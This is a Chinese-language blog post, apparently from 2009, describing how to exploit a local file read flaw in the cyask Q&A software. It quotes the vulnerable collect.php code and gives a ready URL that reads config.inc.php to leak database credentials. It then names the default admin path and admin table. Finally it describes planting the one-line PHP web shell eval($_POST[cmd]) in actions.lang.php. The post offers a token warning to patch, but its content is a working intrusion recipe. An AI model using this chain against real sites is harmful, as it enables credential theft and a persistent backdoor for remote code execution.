cyask的一个本地读文件的漏洞利用

2009, December 14, 4:33 PM. 漏洞集研
Submitted by admin

By:linkboy

昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。
下面是这篇文章的内容。

下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day
然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题
下来看代码,看到collect.php

——————————-

else
{
/*
检查网址
*/
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);

$collect_url=empty($neturl) ? $url : $neturl;

$contents = ”;
if($fid=@fopen($collect_url,”r“))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message(’collect_url_error’, ”);
exit;
}

———————————-
害人啊,本来还挺安全的一个站,整合个毛呃……

找一个cyask的网站,在其上面注册,然后登录后,输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键,点查看源文件,哇,什么都看到了,我只是说出来利用方法,希望大家尽早补漏洞。一切损失与本人无关哦!

------------------------------------------------------------------------------------

powered by cyask

漏洞页面:collect.php
注册用户 http://www.xx.com/collect.php?neturl=config.inc.php

管理员表:cdb_members
问题答案 security quesotion

默认后台: http://www.xx.com/ask/admin.php

编辑器编辑actions 对应actions.lang.php

在最下方guest的默认值改为丛林\\');eval($_POST[cmd])?>;//
链接地址http://www.xx.com/bbs/templates/default/actions.lang.php

Tags: cyask

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):